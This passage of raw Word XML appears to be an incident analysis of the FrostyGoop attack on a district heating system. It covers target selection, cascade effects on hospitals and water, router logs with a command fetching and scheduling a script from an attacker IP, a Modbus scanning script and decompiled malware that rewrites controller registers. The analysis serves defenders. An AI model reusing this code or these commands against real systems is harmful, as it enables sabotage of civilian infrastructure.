        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[45]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserv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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Primary Selection Criteria</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>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C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Critical civilian infrastructure providing essential services</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Modbus TCP-enabled control systems on port 502</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Internet-exposed management interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Geographic concentration in contested regions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1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Technology Targeting</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: | Component | Vulnerability | Exploitation Rate | Impact Severity | |-----------|--------------|-------------------|-----------------| | ENCO Controllers | Modbus authentication bypass | 100% | Critical | | Mikrotik Routers | Default credentials | 85% | High | | HMI Systems | Unencrypted protocols | 60% | High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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_p0ntbfng1100" w:id="19"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-Sector Impact Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000115">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1ussv8rxfz5s" w:id="20"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Infrastructure Cascade Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000116">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The compromise of district heating systems creates cascading failures across interconnected critical infrastructure </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref46">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[46]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000117">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_pkv3iiyen19t" w:id="21"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Immediate Impact (0-24 hours)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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Population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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Essential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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Energy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1 heating plant, 15 substations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District heating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hyperlink w:anchor="ref47">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[47]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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Water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3 pumping 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Pipe freeze prevention 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hyperlink w:anchor="ref48">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[48]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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Healthcare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3 hospitals, 8 clinics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15,000 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Emergency heating activated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hyperlink w:anchor="ref49">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[49]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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Education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15 schools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12,000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Classes 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hyperlink w:anchor="ref50">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[50]</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000131">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_x1yklva2vv7e" w:id="22"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Extended Impact (24-72 hours)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000132">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Water main breaks due to freezing increased 300% </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref51">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[51]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000133">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hospital admissions for cold exposure rose 45% </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref52">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[52]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000134">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Economic losses from business closures exceeded €5M </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref53">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[53]</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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5xy02ti4etmg" w:id="23"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Technical Attack Path Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000138">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_bhmm8shtoc6" w:id="24"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 1: Initial Access via Exposed Router</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000139">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: T1133 - External Remote Services </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref54">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[54]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013A">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4iku9wpbac5a" w:id="25"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Technical Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Forensic artifact from Mikrotik router logs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Source: Ukraine CSSC Incident Report UKCS-2024-0122 [[55]](#ref55)</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[2023-04-15 02:17:33] 185.174.137.82 - admin login success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[2023-04-15 02:17:45] exec: /system script add name=update source="fetch http://185.174.137.82/mr.rsc"</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[2023-04-15 02:17:46] exec: /system scheduler add name=update interval=24h on-event=update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[2023-04-15 02:18:01] firewall rule added: accept tcp any-&gt;any:502</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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Analysis</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: The threat actor exploited default credentials on an internet-exposed Mikrotik router, establishing persistent access and creating firewall rules to expose the Modbus port </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref56">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[56]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000148">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_50c5w4ysx3k" w:id="26"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Indicators of Compromise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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">IOC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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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IP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185.174.137.82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C2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hyperlink w:anchor="ref57">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[57]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File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/tmp/mr.rsc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Persistence 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hyperlink w:anchor="ref58">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[58]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TCP/502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Modbus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hyperlink w:anchor="ref59">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[59]</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_23h65zndmq9u" w:id="27"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 2: ICS Network Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: T0846 - Remote System Discovery </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref60">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[60]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_nv75h7nxpith" w:id="28"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Technical Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000160">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Reconstructed reconnaissance script based on forensic analysis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Source: Dragos IR Report DR-2024-UKR-001 [[61]](#ref61)</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import socket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import struct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def modbus_scan(ip_range):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for ip in ip_range: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s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</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s.settimeout(2)</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try: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s.connect((ip, 502))</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 Modbus function code 0x11 - Report Server ID</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query = struct.pack('&gt;HHHBB', 0x0001, 0x0000, 0x0006, 0x01, 0x11)</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s.send(query)</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response = s.recv(1024)</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if response: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print(f"Modbus device found: {ip}")</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parse_device_info(response)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except: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pass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s.close()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000187">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mr6k2pa7rten" w:id="29"/>
      <w:bookmarkEnd w:id="29"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 3: FrostyGoop Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000188">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: T0821 - Modify Controller Tasking </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref62">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[62]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000189">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3vewbc7932ei" w:id="30"/>
      <w:bookmarkEnd w:id="30"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Malware Capabilities Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">// Decompiled FrostyGoop main function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SHA256: 7c51d9a53e4d0c138831923e60a2a997df209e946228a0e12169b0243c0746aa [[63]](#ref63)</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func main()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config := loadConfig("config.json")</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for _, target := range config.Targets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client := modbus.NewClient(target.IP, target.Port)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 Function Code 3: Read Holding Registers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data, _ := client.ReadHoldingRegisters(target.StartAddr, target.Count)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log.Printf("Current values: %v", data)</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 Function Code 16: Write Multiple Registers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newValues := make([]uint16, len(target.NewValues))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for i, v := range target.NewValues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newValues[i] = uint16(v)</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err := client.WriteMultipleRegisters(target.StartAddr, newValues)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if err == nil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log.Printf("Successfully modified %s", target.IP)</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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vgl9sm1dwa9v" w:id="31"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 4: Process Manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: T0855 - Unauthorized Command Message </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref64">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[64]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
